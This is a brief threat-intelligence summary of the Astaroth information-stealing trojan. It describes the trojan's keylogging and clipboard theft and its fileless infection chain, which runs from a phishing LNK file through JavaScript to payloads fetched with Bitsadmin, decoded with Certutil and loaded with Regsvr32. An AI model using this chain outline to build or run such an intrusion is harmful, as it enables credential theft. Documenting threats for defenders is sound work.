Astaroth is a trojan and information stealer of sensitive information such as user credentials using a key logger module, operating system calls interception, and clipboard monitoring. It is used in a fileless malware campaign in the memory of infected computers. Astaroth also abuses living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Command-line (WMIC) to steathily download and install malware payloads in the background.

The multi-stage infection process begins with a spear-phshing email containing a malicious link to an LNK file. When clicked, it downloads and executes JavaScript code, which downloads the payload by abusing the Bitsadmin tool. The malicious payloads downloaded in the background are all Base64 encoded and are decoded on systems using the Certutil tool in the form of four DLLs that will be loaded using the Regsvr32 tool.

Technical Details

  • BleepingComputer provides technical details and indicators of compromise on recent Astaroth activity, available here.